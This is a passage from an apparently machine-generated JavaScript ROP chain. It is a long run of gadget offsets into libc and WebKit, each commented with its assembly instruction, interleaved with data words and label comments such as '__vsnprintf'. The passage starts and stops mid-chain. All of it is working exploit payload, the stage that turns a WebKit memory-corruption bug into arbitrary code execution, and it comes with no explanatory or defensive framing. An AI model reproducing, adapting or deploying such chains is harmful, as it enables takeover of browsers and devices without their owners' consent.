db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+316184, //L6241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316152, //L6239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+316168, //L6240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+316264, //L6242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6242:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6244:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+316384, //L6247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316368, //L6245
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6245:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6247:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+316528, //L6250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316496, //L6248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+316512, //L6249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6248:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6249:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6250:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+316608, //L6251
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6251:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6253:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+316728, //L6256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316712, //L6254
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6254:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6256:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+316872, //L6259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316840, //L6257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+316856, //L6258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6259:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L6261:
ropchain+316976, //L6260
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+211272, //__ntoa_format
//L6260:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317104, //L6262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+317136, //L6264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+317120, //L6263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6262:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6263:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6264:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317240, //L6265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+317256, //L6266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L6265:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317376, //L6267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+317360, //L6268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L6268:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L6267:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+317464, //L6270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+317448, //L6269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6269:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6270:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317568, //L6271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+317584, //L6272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L6271:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6272:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317704, //L6273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+317688, //L6274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L6274:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L6273:
db([0, 0]); // 0x0
//__vsnprintf:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+317776, //L6276
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L6276:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+317840, //L6278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L6278:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([104, 0]); // 0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+317928, //L6280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6279:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6280:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6281:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+318008, //L6282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6282:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6284:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6286:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+318168, //L6289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+318152, //L6287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6289:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+318328, //L6293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+318280, //L6290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+318296, //L6291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6290:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6291:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6293:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+318464, //L6295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+318480, //L6296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+318448, //L6294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6294:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6296:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+318592, //L6298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+318640, //L6301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+318608, //L6299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6298:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6299:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6300:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6301:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+318752, //L6302+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+318744, //L6302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6302:
db([0, 0]); // 0x0
set_gadgets([
ropchain+318768, //L6302+24
ropchain+318872, //L6297
libc_base+731401, //mov rax, r8
libc_base+763368, //pop rcx
//L6303:
ropchain+165824, //__out_null
libc_base+764760 //pop rsi
]);
//L6305:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+318864, //L6306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6306:
db([0, 0]); // 0x0
//L6297:
//L6308:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+318912, //L6309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6309:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6311:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+319032, //L6314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+319016, //L6312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6312:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6314:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+319112, //L6315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+319128, //L6316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6315:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6316:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+319288, //L6320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+319256, //L6318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+319272, //L6319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6317:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6318:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6319:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6320:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+319344, //L6322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6322:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+319472, //L6324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+319488, //L6325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+319456, //L6323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6323:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6324:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6325:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+319648, //L6329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+319616, //L6327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+319632, //L6328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6326:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+319704, //L6331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6331:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+319832, //L6333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+319848, //L6334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+319816, //L6332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6332:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6333:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6334:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+320008, //L6338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+319976, //L6336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+319992, //L6337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6335:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6336:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6337:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6338:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+320064, //L6340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+320192, //L6342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+320208, //L6343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+320176, //L6341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6341:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6343:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+320320, //L6345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+320368, //L6348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+320336, //L6346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6345:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6346:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6347:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6348:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+320480, //L6349+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+320472, //L6349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6349:
db([0, 0]); // 0x0
set_gadgets([
ropchain+320496, //L6349+24
ropchain+548880, //L6344
libc_base+764760, //pop rsi
ropchain+320536, //L6350
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6350:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6352:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+320656, //L6355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+320640, //L6353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6353:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6355:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+320736, //L6356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+320752, //L6357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6356:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6357:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+320912, //L6361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+320880, //L6359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+320896, //L6360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6358:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6359:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6360:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6361:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+320968, //L6363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6363:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+321096, //L6365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+321112, //L6366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+321080, //L6364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6364:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6365:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6366:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+321272, //L6370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+321240, //L6368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+321256, //L6369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6367:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6368:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6369:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6370:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+321328, //L6372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6372:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+321456, //L6374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+321472, //L6375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+321440, //L6373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6373:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6374:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6375:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+321632, //L6379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+321600, //L6377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+321616, //L6378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6376:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6377:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6378:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6379:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+321688, //L6381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6381:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+321816, //L6383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+321832, //L6384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+321800, //L6382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6382:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6383:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6384:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+321912, //L6385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+321928, //L6386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6385:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6386:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+322024, //L6388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+322008, //L6387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6387:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6388:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
